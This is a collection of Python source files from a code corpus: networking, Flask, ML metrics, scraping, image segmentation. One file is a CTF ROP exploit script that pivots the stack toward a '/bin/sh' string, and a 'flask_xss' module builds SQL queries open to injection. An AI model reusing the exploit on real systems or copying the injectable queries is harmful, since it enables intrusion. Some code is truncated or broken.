+{"seq_id":"213319249","text":"# Written and modifed by Muhammad Hakimi bin Mohd Laji (2019290708) #\n# Based on codes from https://linuxhint.com/python_socket_file_transfer_send/ #\n# Simple Python code for file transfer from client to server #\n# This code is for CLIENT side #\n\n# Importing libraries\nimport socket\nimport sys\n\n# Lets catch the 1st argument as server ip\nif (len(sys.argv) > 1):\n ServerIp = sys.argv[1]\nelse:\n print(\"\\nRun like \\n python3 clientStore.py < server ip address > \\n\\n\")\n exit(1)\n\n\n# Now we can create socket object\ns = socket.socket()\n\n# Lets choose one port and connect to that port\nPORT = 9898\n\n# Lets connect to that port where server may be running\ns.connect((ServerIp, PORT))\n\n# We can send any file by typing its name including the extension (example: boi.c)\nfiletosend = input('\\nEnter the file name to be stored in server: ') \ns.send(filetosend.encode()) \nfile = open(filetosend, \"rb\") \n\nSendData = file.read(99999)\n\nwhile SendData:\n # Now we can receive data from server\n print(\"\\n>Message received from the server:\", s.recv(1024).decode(\"utf-8\"))\n #Now send the content of the file to server\n s.send(SendData)\n SendData = file.read(99999)\n print(\">\" + filetosend + \" has been copied successfully to the server for storage.\\n\")\n \n# Close the connection from client side\ns.close()\n","sub_path":"clientStore.py","file_name":"clientStore.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"26594809","text":"from flask import flash, render_template, url_for, redirect, Blueprint\nfrom __init__ import mongo\n\n############################################################\n# MAIN ROUTES\n############################################################\n\nmain = Blueprint('main', __name__, template_folder=\"templates\")\n\n\n@main.route('/')\ndef home():\n \"\"\"Display the home page.\"\"\"\n # find all unanswered posts\n post_data = mongo.db.posts.find()\n\n context = {\n 'posts': post_data\n }\n return render_template('home.html', **context)\n","sub_path":"routes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"66157586","text":"import json\nimport os\nimport sys\n\n\nclass Results:\n \"\"\"\n Record the results and store them to the json files\n \"\"\"\n def __init__(self, exp_name, writer):\n self.exp_name = exp_name\n self.writer = writer\n if not os.path.exists('./json/'):\n os.mkdir('./json/')\n if not os.path.exists('./json/' + exp_name):\n os.mkdir('./json/' + exp_name)\n\n self.exp_path = './json/' + exp_name + '/result.json'\n\n # See whether this experiment exists\n if os.path.exists(self.exp_path):\n print('This experiment has ben run.')\n sys.exit()\n\n # create the dictionary container for results to be recorded\n\n self.result = {\n 'name': exp_name,\n 'epoch': [],\n 'train_loss': [],\n 'train_acc@1': [],\n 'train_acc@5': [],\n 'test_acc@1': [],\n 'test_acc@5': [],\n }\n\n def record(self, loss, top1_t, top5_t, acc1, acc5, epoch, lr=0.1):\n self.writer.add_scalar('train_loss', loss, global_step=epoch)\n self.writer.add_scalar('train_acc@1', top1_t, global_step=epoch)\n self.writer.add_scalar('train_acc@5', top5_t, global_step=epoch)\n self.writer.add_scalar('test_acc@1', acc1, global_step=epoch)\n self.writer.add_scalar('test_acc@5', acc5, global_step=epoch)\n self.writer.add_scalar('lr', lr, global_step=epoch)\n self.result['train_loss'].append(loss)\n self.result['epoch'].append(epoch)\n self.result['train_acc@1'].append(top1_t)\n self.result['train_acc@5'].append(top5_t)\n self.result['test_acc@1'].append(acc1)\n self.result['test_acc@5'].append(acc5)\n\n def write_result(self):\n # write json file\n with open(self.exp_path, 'w') as file:\n json.dump(self.result, file)\n self.writer.close()\n","sub_path":"imagenet/utils/result_processor.py","file_name":"result_processor.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"55958358","text":"#coding=utf-8\nimport sqlite3\n\ndef connect_db():\n return sqlite3.connect(\"./database.db\")\n\n#login\ndef get_user_from_username_and_password(username, password):\n conn = connect_db()\n cur = conn.cursor()\n cur.execute('SELECT id, username FROM `user` WHERE username=\\'%s\\' AND password=\\'%s\\'' % (username, password))\n row = cur.fetchone()\n conn.commit()\n conn.close()\n return {'id': row[0], 'username': row[1]} if row is not None else None\n\n\ndef get_user_from_id(uid):\n conn = connect_db()\n cur = conn.cursor()\n cur.execute('SELECT id, username FROM `user` WHERE id=%d' % uid)\n row = cur.fetchone()\n conn.commit()\n conn.close()\n return {'id': row[0], 'username': row[1]}\n\n\ndef create_time_line(uid, content):\n conn = connect_db()\n cur = conn.cursor()\n cur.execute('INSERT INTO `time_line` VALUES (NULL, %d, \\'%s\\')' % (uid, content))\n row = cur.fetchone()\n conn.commit()\n conn.close()\n return row\n\n\ndef get_time_lines():\n conn = connect_db()\n cur = conn.cursor()\n cur.execute('SELECT id, user_id, content FROM `time_line` ORDER BY id DESC')\n rows = cur.fetchall()\n conn.commit()\n conn.close()\n return map(lambda row: {'id': row[0], 'user_id': row[1], 'content': row[2]}, rows)\n\n\ndef user_delete_time_line_of_id(uid, tid):\n conn = connect_db()\n cur = conn.cursor()\n cur.execute('DELETE FROM `time_line` WHERE user_id=%s AND id=%s' % (uid, tid))\n conn.commit()\n conn.close()\n","sub_path":"flask_xss/curd.py","file_name":"curd.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"455201760","text":"import os\nfrom random import randint as get\n\ndef gen():\n\tf = open(\"input.txt\", \"w\")\n\tn = get(1, 30)\n\tm = get(1, 30)\n\tq = get(1, 20)\n\tprint(n, m, q, file = f)\n\tfor i in range(n):\n\t\tfor i in range(m):\n\t\t\tprint(get(0, 1), end = \"\", file = f)\n\t\tprint(file = f)\n\tfor i in range(q):\n\t\tprint(get(1, n), get(1, m), get(1, 10), file = f)\n\ndef main():\n\tos.system(\"make c && make stupid\")\n\tfor te in range(10**6):\n\t\tgen()\n\t\tos.system(\"./c < input.txt > output.txt\")\n\t\tout = open(\"output.txt\", \"r\").read()\n\t\tos.system(\"./stupid < input.txt > output.txt\")\n\t\tans = open(\"output.txt\", \"r\").read()\n\t\tif (ans != out):\n\t\t\tprint(\"WA\", te)\n\t\t\tprint(\"input = \")\n\t\t\tprint(open(\"input.txt\", \"r\").read())\n\t\t\tprint(\"ans = \", ans)\n\t\t\tprint(\"out = \", out)\n\t\t\tbreak\n\t\tprint(\"OK\", te)\nmain()","sub_path":"2020/CF/641/stress.py","file_name":"stress.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"611681427","text":"'''\nTaras Zherebetskyy.\nConstraint Satisfacion Problems\n\nThe program, composed by a class Node that creates objects stored in an array alled graph.\nthe nodes are connected by pointers \n\nX set of variables: nodes rapresented ny numbers {x0, x1, x2, x3, x4, x5, x6}\nD set of domains: Colors in this case {\"Red\", \"Green\", \"Blue\"}\nC set of constraints {\"will be defined at the end, when problem is solved\"}\n'''\n\nclass Node:\n def __init__(self, num):\n self.node = num #hold the number of the node\n self.color = \"\" #hold the color \n self.vertex = [] # hold all the verteces\n \n def set_connection(self, vertex): # the function set a pointer to the Node it is connected to and viceversa\n for i in vertex:\n self.vertex.append(i)\n i.vertex.append(self)\n\n def print(self): #just a print function\n print(f'''\n Node: {self.node}\n Color: \\t{self.color}\n Verteces:\\t ''', end='')\n for i in self.vertex: print(i.node,\":\", i.color, \",\", end=\" \")\n\ndef print_graph(graph): #print function\n for i in graph:\n i.print()\n\ndef print_constraint(graph):\n print(\"\\n\", \"C = {\", end=\" \")\n for i in graph:\n print(f\"<{i.node},{i.color}>\", end=\" \")\n print(\"}\")\n\ndef collision(node):\n for ver in node.vertex: #loop through all verteces and return true if there are collision\n if node.color == ver.color: return True\n return False\n\ndef compile_colors(graph, colors):\n for node in graph: # Looping throught each node\n i = 0 #setting the node with color 0\n node.color = colors[i] \n while collision(node):\n i += 1\n if i > 2: \n print(\"This graph can't be solved\")\n node.color = \"No color\"\n return\n node.color = colors[i]\n\n'''\n MAIN STARTS HERE\n'''\ncolors = [\"Red\", \"Green\", \"Blue\"] #colors that are used\ngraph = [] #this list will contain each node in the graph\nj = 0 # j will number each node\n\n#this loop will append all the nodes inside the array\nfor i in range(6):\n graph.append(Node(j))\n j += 1\n\n# setting the connections. the function \"set_connection\" will connect a pointer to the node it is conected and viceversa\ngraph[0].set_connection([graph[1], graph[2]])\ngraph[2].set_connection([graph[1], graph[3], graph[5], graph[4]])\ngraph[1].set_connection([graph[3]])\ngraph[3].set_connection([graph[5]])\ngraph[4].set_connection([graph[5]])\n\n'''\n# this node is used to check if the function can recognize if a graph is not solvable \n# uncomment for test.\ngraph.append(Node(6))\ngraph[6].set_connection([graph[4], graph[5], graph[2]])\n'''\n\n'''\n# uncomment the next for the change the structure of the graph adding another node.\n# in this case it works becasue the node 6 doesn't collide with other colors\ngraph.append(Node(6))\ngraph[6].set_connection([graph[4], graph[2], graph[0]])\n'''\n\ncompile_colors(graph, colors)\nprint_graph(graph)\nprint_constraint(graph)\n","sub_path":"CSP.py","file_name":"CSP.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"613781146","text":"from zio import *\n\noffset = 112\n\naddr_plt_read = 0x08048390 # objdump -d -j.plt bof | grep \"read\"\naddr_plt_write = 0x080483c0 # objdump -d -j.plt bof | grep \"write\"\n\n#./rp-lin-x86 --file=bof --rop=3 --unique > gadgets.txt\npppop_ret = 0x0804856c\npop_ebp_ret = 0x08048453\nleave_ret = 0x08048481\n\nstack_size = 0x800\naddr_bss = 0x0804a020 # readelf -S bof | grep \".bss\"\nbase_stage = addr_bss + stack_size\n\ntarget = \"./bof\"\nio = zio((target))\n\nio.read_until('Welcome to XDCTF2015~!\\n')\n# io.gdb_hint([0x80484bd])\n\nbuf1 = 'A' * offset\nbuf1 += l32(addr_plt_read)\nbuf1 += l32(pppop_ret)\nbuf1 += l32(0)\nbuf1 += l32(base_stage)\nbuf1 += l32(100)\nbuf1 += l32(pop_ebp_ret)\nbuf1 += l32(base_stage)\nbuf1 += l32(leave_ret)\nio.writeline(buf1)\n\ncmd = \"/bin/sh\"\n\nbuf2 = 'AAAA'\nbuf2 += l32(addr_plt_write)\nbuf2 += 'AAAA'\nbuf2 += l32(1)\nbuf2 += l32(base_stage+80)\nbuf2 += l32(len(cmd))\nbuf2 += 'A' * (80-len(buf2))\nbuf2 += cmd + '\\x00'\nbuf2 += 'A' * (100-len(buf2))\nio.writeline(buf2)\nio.interact()\n","sub_path":"xdctf_2015/exploit2/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"395603157","text":"\"\"\"\nThis module adds the RPG database from earlier this week to MongoDB.\n\"\"\"\n\nimport sqlite3\nimport numpy as np\nimport pandas as pd\nimport pymongo\n# REMOVED PASSWORD\nclient = pymongo.MongoClient(\"mongodb://will_cotton:@cluster0-shard-00-00-kwojs.mongodb.net:27017,cluster0-shard-00-01-kwojs.mongodb.net:27017,cluster0-shard-00-02-kwojs.mongodb.net:27017/test?ssl=true&replicaSet=Cluster0-shard-0&authSource=admin&retryWrites=true&w=majority\")\ndb = client.test\n\nconn = sqlite3.connect('rpg_db.sqlite3')\ncurs = conn.cursor()\n\n\ntable_titles = ['armory_item', 'armory_weapon', 'charactercreator_character',\n 'charactercreator_character_inventory',\n 'charactercreator_cleric', 'charactercreator_fighter',\n 'charactercreator_mage', 'charactercreator_necromancer',\n 'charactercreator_thief']\n\ntable_schema_dict = {}\nfor table in table_titles:\n query = 'PRAGMA table_info(' + table + ');'\n curs.execute(query)\n results = curs.fetchall()\n col_names = []\n for result in results:\n col_names.append(result[1])\n table_schema_dict[table] = col_names\n\ntables_listed = []\n\nfor table in table_titles:\n col_names = table_schema_dict[table]\n query = \"SELECT * FROM \" + table + \";\"\n curs.execute(query)\n rows = curs.fetchall()\n table_rows_list = []\n for row in rows:\n i = 0\n row_dicted = {}\n for item in row:\n row_dicted[col_names[i]] = item\n i += 1\n table_rows_list.append(row_dicted)\n tables_listed.append(table_rows_list)\n\nfor table in tables_listed:\n db.test.insert_many(table)\n","sub_path":"module3-nosql-and-document-oriented-databases/mongo_rpg.py","file_name":"mongo_rpg.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"410583015","text":"#!user/bin/env/python\n#-*-coding:utf-8-*-\n# author: albert time:2019/7/30\n\nfrom .get_page import get_page\nfrom pyquery import PyQuery as pq\n\nclass ProxyMetaclass(type):\n #元类\n def __new__(cls, name, bases, attrs):\n count = 0\n attrs['__CrawlFunc__'] = []\n for k,v in attrs.items():\n if 'crawl_' in k:\n attrs['__CrawlFunc__'].append(k)\n count += 1\n attrs['__CrawlFuncCount__'] = count\n return type.__new__(cls,name,bases,attrs)\n \nclass Crawler(object,metaclass=ProxyMetaclass):\n def get_proxies(self,callback):\n proxies = []\n for proxy in eval(\"self.{}()\".format(callback)):\n print('成功获取代理',proxy)\n proxies.append(proxy)\n return proxies\n \n def crawl_xici(self):\n '''\n 获取代理西刺:https://www.xicidaili.com/\n :param page:页码\n :return:代理\n '''\n url = 'https://www.xicidaili.com/'\n html = get_page(url)\n if html:\n doc = pq(html)\n trs = doc('#ip_list tr:gt(1)').items()\n # print(trs)\n for tr in trs:\n # print(tr)\n ip = tr.find('td:nth-child(2)').text()\n port = tr.find('td:nth-child(3)').text()\n if ip is not '' and port is not '':\n #代理生成器\n yield ':'.join([ip, port])\n # def crawl_proxy360(self):\n # pass\n # def crawl_goubanjia(self):\n # pass\n def crawl_kuaidaili(self):\n url = 'https://www.kuaidaili.com/ops/'\n html = get_page(url)\n if html:\n doc = pq(html)\n trs = doc('#freelist > table > tbody tr').items()\n for tr in trs:\n ip = tr.find('td:nth-child(1)').text()\n port = tr.find('td:nth-child(2)').text()\n print(':'.join([ip, port]))\n ","sub_path":"dailichi/proxy_pool/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"605950218","text":"# iter over fasta sequences\n\nfrom itertools import groupby\nimport random\nimport sys\n\n\ndef fasta_iter(fasta_file):\n for header, group in groupby(fasta_file, lambda line: line[0] == \">\"):\n if header:\n line = group.next()\n ensembl_id = line[1:].strip()\n else:\n sequence = ''.join(line.strip() for line in group)\n yield ensembl_id, sequence\n\n\ndef filter_file(inputf, outputf, N):\n sequences = []\n with open(outputf, 'w+') as f:\n for name, seq in fasta_iter(open(inputf)):\n sequences.append((name, seq))\n\n for name, seq in sorted(sequences, key=lambda x: len(x[1]), reverse=True)[:N]:\n f.write(\">%s\\n%s\\n\" % (name, seq))\n\n\nfilter_file(sys.argv[1], sys.argv[2], int(sys.argv[3]))\n\n\n","sub_path":"sga_version/select_longest.py","file_name":"select_longest.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"540262575","text":"\"\"\" Software to create Precision-Recall-Gain curves.\n\nPrecision-Recall-Gain curves and how to cite this work is available at\nhttp://www.cs.bris.ac.uk/~flach/PRGcurves/.\n\"\"\"\nimport warnings\nimport numpy as np\nfrom typing import Iterable\nimport matplotlib.pyplot as plt\n\nepsilon = 1e-7\n\n\ndef precision(tp, fp):\n return tp / (tp + fp + epsilon)\n\n\ndef recall(tp, fn):\n return tp / (tp + fn + epsilon)\n\n\ndef precision_gain(tp, fn, fp, tn):\n \"\"\"Calculates Precision Gain from the contingency table\n\n This function calculates Precision Gain from the entries of the contingency\n table: number of true positives (TP), false negatives (FN), false positives\n (FP), and true negatives (TN). More information on Precision-Recall-Gain\n curves and how to cite this work is available at\n http://www.cs.bris.ac.uk/~flach/PRGcurves/.\n \"\"\"\n n_pos = tp + fn\n n_neg = fp + tn\n prec_gain = 1. - (n_pos / (n_neg + epsilon)) * (fp / (tp + epsilon))\n if isinstance(prec_gain, Iterable):\n prec_gain[tn + fn == 0] = 0\n elif tn + fn == 0:\n prec_gain = 0\n return prec_gain\n\n\ndef recall_gain(tp, fn, fp, tn):\n \"\"\"Calculates Recall Gain from the contingency table\n\n This function calculates Recall Gain from the entries of the contingency\n table: number of true positives (TP), false negatives (FN), false positives\n (FP), and true negatives (TN). More information on Precision-Recall-Gain\n curves and how to cite this work is available at\n http://www.cs.bris.ac.uk/~flach/PRGcurves/.\n\n Args:\n tp (float) or ([float]): True Positives\n fn (float) or ([float]): False Negatives\n fp (float) or ([float]): False Positives\n tn (float) or ([float]): True Negatives\n Returns:\n (float) or ([float])\n \"\"\"\n n_pos = tp + fn\n n_neg = fp + tn\n recall_gain = 1. - (n_pos / (n_neg + epsilon)) * (fn / (tp + epsilon))\n if isinstance(recall_gain, Iterable):\n recall_gain[tn + fn == 0] = 1\n elif tn + fn == 0:\n recall_gain = 1\n return recall_gain\n\ndef create_segments(y_true, y_pred):\n \"\"\"\n for each class:\n sort descending confidence\n for each confidence level:\n n_positive, n_negative in gr truth\n , slice batch col\n sort descending confidence\n \"\"\"\n n_samples, n_classes = np.shape(y_true)\n n_true_pos_per_class = y_true.sum(axis=0)\n n_true_neg_per_class = n_samples*np.ones(n_classes) - n_true_pos_per_class\n\n threshed_metrics = []\n for thresh in np.linspace(1,0,101): # exactly 0.01 apart\n pred_threshed = (y_pred >= thresh)\n # num_correct = ((pred_threshed == y_true).sum(dim=0))\n\n # these are classwise\n tp = (y_true * y_pred).sum(dim=0)\n tn = ((1 - y_true) * (1 - y_pred)).sum(dim=0)\n fp = ((1 - y_true) * y_pred).sum(dim=0)\n fn = (y_true * (1 - y_pred)).sum(dim=0)\n\n # these are class-wise inference\n precisions = precision(tp, fp)\n precision_gains = precision_gain(tp, fn, fp, tn)\n recalls = recall(tp, fn)\n recall_gains = recall_gain(tp, fn, fp, tn)\n\n f1s = 2* (precisions*recalls) / (precisions + recalls + epsilon)\n f1s = f1s.clamp(min=epsilon, max=1-epsilon) # TODO should be unnecessary\n\n threshed_metrics.append(dict(thresh=thresh,\n tp=tp,\n tn=tn,\n fp=fp,\n fn=fn,\n precisions=precisions,\n precision_gains=precision_gains,\n recalls=recalls,\n recall_gains=recall_gains,\n f1s=f1s))\n\n return threshed_metrics\n\ndef get_point(curve, index):\n keys = curve.keys()\n point = np.zeros(len(keys))\n key_indices = dict()\n for i, key in enumerate(keys):\n point[i] = curve[key][index]\n key_indices[key] = i\n return [point, key_indices]\n\n\ndef insert_point(new_point, key_indices, curve, precision_gain=0,\n recall_gain=0, is_crossing=0):\n for key in key_indices.keys():\n curve[key] = np.insert(curve[key], 0, new_point[key_indices[key]])\n curve['precision_gain'][0] = precision_gain\n curve['recall_gain'][0] = recall_gain\n curve['is_crossing'][0] = is_crossing\n new_order = np.lexsort((-curve['precision_gain'], curve['recall_gain']))\n for key in curve.keys():\n curve[key] = curve[key][new_order]\n return curve\n\n\ndef _create_crossing_points(curve, n_pos, n_neg, n_classes):\n n = n_pos + n_neg\n curve['is_crossing'] = np.zeros(n_classes)\n # introduce a crossing point at the crossing through the y-axis\n j = np.amin(np.where(curve['recall_gain'] >= 0)[0])\n if curve['recall_gain'][j] > 0: # otherwise there is a point on the boundary and no need for a crossing point\n [point_1, key_indices_1] = get_point(curve, j)\n [point_2, key_indices_2] = get_point(curve, j - 1)\n delta = point_1 - point_2\n if delta[key_indices_1['TP']] > 0:\n alpha = (n_pos * n_pos / n - curve['TP'][j - 1]) / delta[key_indices_1['TP']]\n else:\n alpha = 0.5\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n new_point = point_2 + alpha * delta\n\n new_prec_gain = precision_gain(new_point[key_indices_1['TP']], new_point[key_indices_1['FN']],\n new_point[key_indices_1['FP']], new_point[key_indices_1['TN']])\n curve = insert_point(new_point, key_indices_1, curve,\n precision_gain=new_prec_gain, is_crossing=1)\n\n # now introduce crossing points at the crossings through the non-negative part of the x-axis\n x = curve['recall_gain']\n y = curve['precision_gain']\n temp_y_0 = np.append(y, 0)\n temp_0_y = np.append(0, y)\n temp_1_x = np.append(1, x)\n indices = np.where(np.logical_and((temp_y_0 * temp_0_y < 0), (temp_1_x >= 0)))[0]\n for i in indices:\n cross_x = x[i - 1] + (-y[i - 1]) / (y[i] - y[i - 1]) * (x[i] - x[i - 1])\n [point_1, key_indices_1] = get_point(curve, i)\n [point_2, key_indices_2] = get_point(curve, i - 1)\n delta = point_1 - point_2\n if delta[key_indices_1['TP']] > 0:\n alpha = (n_pos * n_pos / (n - n_neg * cross_x) - curve['TP'][i - 1]) / delta[key_indices_1['TP']]\n else:\n alpha = (n_neg / n_pos * curve['TP'][i - 1] - curve['FP'][i - 1]) / delta[key_indices_1['FP']]\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n new_point = point_2 + alpha * delta\n\n new_rec_gain = recall_gain(new_point[key_indices_1['TP']], new_point[key_indices_1['FN']],\n new_point[key_indices_1['FP']], new_point[key_indices_1['TN']])\n curve = insert_point(new_point, key_indices_1, curve,\n recall_gain=new_rec_gain, is_crossing=1)\n i += 1\n indices += 1\n x = curve['recall_gain']\n y = curve['precision_gain']\n temp_y_0 = np.append(y, 0)\n temp_0_y = np.append(0, y)\n temp_1_x = np.append(1, x)\n return curve\n\n\ndef create_prg_curve(y_true, y_pred):\n \"\"\"Precision-Recall-Gain curve\n\n This function creates the Precision-Recall-Gain curve from the vector of\n y_true and vector of scores where higher score indicates a higher\n probability to be positive. More information on Precision-Recall-Gain\n curves and how to cite this work is available at\n http://www.cs.bris.ac.uk/~flach/PRGcurves/.\n \"\"\"\n threshed_metrics = create_segments(y_true, y_pred)\n # calculate recall gains and precision gains for all thresholds\n curve = dict()\n curve['pos_score'] = np.insert(segments['pos_score'], 0, np.inf) # start at inf\n curve['neg_score'] = np.insert(segments['neg_score'], 0, -np.inf) # start at -inf\n curve['TP'] = np.insert(np.cumsum(segments['pos_count']), 0, 0) # start at 0\n curve['FP'] = np.insert(np.cumsum(segments['neg_count']), 0, 0) # start at 0\n curve['FN'] = n_pos - curve['TP']\n curve['TN'] = n_neg - curve['FP']\n # curve['TP'] = (y_true * y_pred).sum(axis=0) # .to(torch.float32)\n # curve['TN'] = ((1 - y_true) * (1 - y_pred)).sum(axis=0) # .to(torch.float32)\n # curve['FP'] = ((1 - y_true) * y_pred).sum(axis=0) # .to(torch.float32)\n # curve['FN'] = (y_true * (1 - y_pred)).sum(axis=0) # .to(torch.float32)\n\n curve['precision'] = precision(curve['TP'], curve['FP'])\n curve['recall'] = recall(curve['TP'], curve['FN'])\n curve['precision_gain'] = precision_gain(curve['TP'], curve['FN'], curve['FP'], curve['TN'])\n curve['recall_gain'] = recall_gain(curve['TP'], curve['FN'], curve['FP'], curve['TN'])\n curve = _create_crossing_points(curve, n_pos, n_neg, n_classes)\n\n curve['in_unit_square'] = np.logical_and(curve['recall_gain'] >= 0,\n curve['precision_gain'] >= 0)\n return curve #tp, fp, tn, fn, precision_gain, recall_gain, n_thresh\n\n\ndef calc_auprg(prg_curve):\n \"\"\"Calculate area under the Precision-Recall-Gain curve\n\n This function calculates the area under the Precision-Recall-Gain curve\n from the results of the function create_prg_curve. More information on\n Precision-Recall-Gain curves and how to cite this work is available at\n http://www.cs.bris.ac.uk/~flach/PRGcurves/.\n \"\"\"\n area = 0\n recall_gain = prg_curve['recall_gain']\n precision_gain = prg_curve['precision_gain']\n for i in range(1, len(recall_gain)):\n if (not np.isnan(recall_gain[i - 1])) and (recall_gain[i - 1] >= 0):\n width = recall_gain[i] - recall_gain[i - 1]\n height = (precision_gain[i] + precision_gain[i - 1]) / 2\n area += width * height\n return (area)\n\n\ndef convex_hull(points):\n \"\"\"Computes the convex hull of a set of 2D points.\n\n Input: an iterable sequence of (x, y) pairs representing the points.\n Output: a list of vertices of the convex hull in counter-clockwise order,\n starting from the vertex with the lexicographically smallest coordinates.\n Implements Andrew's monotone chain algorithm. O(n log n) complexity.\n Source code from:\n https://en.wikibooks.org/wiki/Algorithm_Implementation/Geometry/Convex_hull/Monotone_chain\n \"\"\"\n\n # Sort the points lexicographically (tuples are compared lexicographically).\n # Remove duplicates to detect the case we have just one unique point.\n points = sorted(set(points))\n\n # Boring case: no points or a single point, possibly repeated multiple times.\n if len(points) <= 1:\n return points\n\n # 2D cross product of OA and OB vectors, i.e. z-component of their 3D cross product.\n # Returns a positive value, if OAB makes a counter-clockwise turn,\n # negative for clockwise turn, and zero if the points are collinear.\n def cross(o, a, b):\n return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0])\n\n # Build upper hull\n upper = []\n for p in reversed(points):\n while len(upper) >= 2 and cross(upper[-2], upper[-1], p) <= 0:\n upper.pop()\n upper.append(p)\n\n return upper\n\n\ndef plot_prg(prg_curve, show_convex_hull=True, show_f_calibrated_scores=False):\n \"\"\"Plot the Precision-Recall-Gain curve\n\n This function plots the Precision-Recall-Gain curve resulting from the\n function create_prg_curve using ggplot. More information on\n Precision-Recall-Gain curves and how to cite this work is available at\n http://www.cs.bris.ac.uk/~flach/PRGcurves/.\n\n @param prg_curve the data structure resulting from the function create_prg_curve\n @param show_convex_hull whether to show the convex hull (default: TRUE)\n @param show_f_calibrated_scores whether to show the F-calibrated scores (default:TRUE)\n @return the ggplot object which can be plotted using print()\n @details This function plots the Precision-Recall-Gain curve, indicating\n for each point whether it is a crossing-point or not (see help on\n create_prg_curve). By default, only the part of the curve\n within the unit square [0,1]x[0,1] is plotted.\n @examples\n labels = c(1,1,1,0,1,1,1,1,1,1,0,1,1,1,0,1,0,0,1,0,0,0,1,0,1)\n scores = (25:1)/25\n plot_prg(create_prg_curve(labels,scores))\n \"\"\"\n pg = prg_curve['precision_gain']\n rg = prg_curve['recall_gain']\n\n fig = plt.figure(figsize=(6, 5))\n plt.clf()\n plt.axes(frameon=False)\n ax = fig.gca()\n ax.set_xticks(np.arange(0, 1.25, 0.25))\n ax.set_yticks(np.arange(0, 1.25, 0.25))\n ax.grid(b=True)\n ax.set_xlim((-0.05, 1.02))\n ax.set_ylim((-0.05, 1.02))\n ax.set_aspect('equal')\n # Plot vertical and horizontal lines crossing the 0 axis\n plt.axvline(x=0, ymin=-0.05, ymax=1, color='k')\n plt.axhline(y=0, xmin=-0.05, xmax=1, color='k')\n plt.axvline(x=1, ymin=0, ymax=1, color='k')\n plt.axhline(y=1, xmin=0, xmax=1, color='k')\n # Plot cyan lines\n indices = np.arange(np.argmax(prg_curve['in_unit_square']) - 1,\n len(prg_curve['in_unit_square']))\n plt.plot(rg[indices], pg[indices], 'c-', linewidth=2)\n # Plot blue lines\n indices = np.logical_or(prg_curve['is_crossing'],\n prg_curve['in_unit_square'])\n plt.plot(rg[indices], pg[indices], 'b-', linewidth=2)\n # Plot blue dots\n indices = np.logical_and(prg_curve['in_unit_square'],\n True - prg_curve['is_crossing'])\n plt.scatter(rg[indices], pg[indices], marker='o', color='b', s=40)\n # Plot lines out of the boundaries\n plt.xlabel('Recall Gain')\n plt.ylabel('Precision Gain')\n\n valid_points = np.logical_and(~ np.isnan(rg), ~ np.isnan(pg))\n upper_hull = convex_hull(zip(rg[valid_points], pg[valid_points]))\n rg_hull, pg_hull = zip(*upper_hull)\n if show_convex_hull:\n plt.plot(rg_hull, pg_hull, 'r--')\n if show_f_calibrated_scores:\n raise Exception(\"Show calibrated scores not implemented yet\")\n plt.show()\n return fig\n\n\ndef plot_pr(prg_curve):\n p = prg_curve['precision']\n r = prg_curve['recall']\n\n fig = plt.figure(figsize=(6, 5))\n plt.clf()\n plt.axes(frameon=False)\n ax = fig.gca()\n ax.set_xticks(np.arange(0, 1.25, 0.25))\n ax.set_yticks(np.arange(0, 1.25, 0.25))\n ax.grid(b=True)\n ax.set_xlim((-0.05, 1.02))\n ax.set_ylim((-0.05, 1.02))\n ax.set_aspect('equal')\n # Plot vertical and horizontal lines crossing the 0 axis\n plt.axvline(x=0, ymin=-0.05, ymax=1, color='k')\n plt.axhline(y=0, xmin=-0.05, xmax=1, color='k')\n plt.axvline(x=1, ymin=0, ymax=1, color='k')\n plt.axhline(y=1, xmin=0, xmax=1, color='k')\n # Plot blue lines\n plt.plot(r, p, 'ob-', linewidth=2)\n plt.xlabel('Recall')\n plt.ylabel('Precision')\n\n plt.show()\n return fig\n","sub_path":"Python_package/prg/prg.py","file_name":"prg.py","file_ext":"py","file_size_in_byte":14964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"560881268","text":"\"\"\"Module for segmenting cells and markers.\"\"\"\n\nfrom jicbioimage.transform import (\n dilate_binary,\n invert,\n remove_small_objects,\n max_intensity_projection,\n)\nfrom jicbioimage.segment import (\n connected_components,\n watershed_with_seeds,\n)\n\nfrom utils import threshold_abs, remove_large_segments\n\n\ndef cell_segmentation(wall_intensity2D, wall_mask2D, max_cell_size):\n \"\"\"Return image segmented into cells.\"\"\"\n seeds = dilate_binary(wall_mask2D)\n seeds = invert(seeds)\n seeds = remove_small_objects(seeds, min_size=10)\n seeds = connected_components(seeds, background=0)\n segmentation = watershed_with_seeds(-wall_intensity2D, seeds=seeds)\n segmentation = remove_large_segments(segmentation, max_cell_size)\n return segmentation\n\n\ndef marker_segmentation(marker_intensity3D, wall_mask3D, threshold):\n \"\"\"Return fluorescent marker segmentation.\"\"\"\n marker_intensity3D = marker_intensity3D * wall_mask3D\n markers2D = max_intensity_projection(marker_intensity3D)\n markers2D = threshold_abs(markers2D, threshold)\n markers2D = remove_small_objects(markers2D, min_size=50)\n return 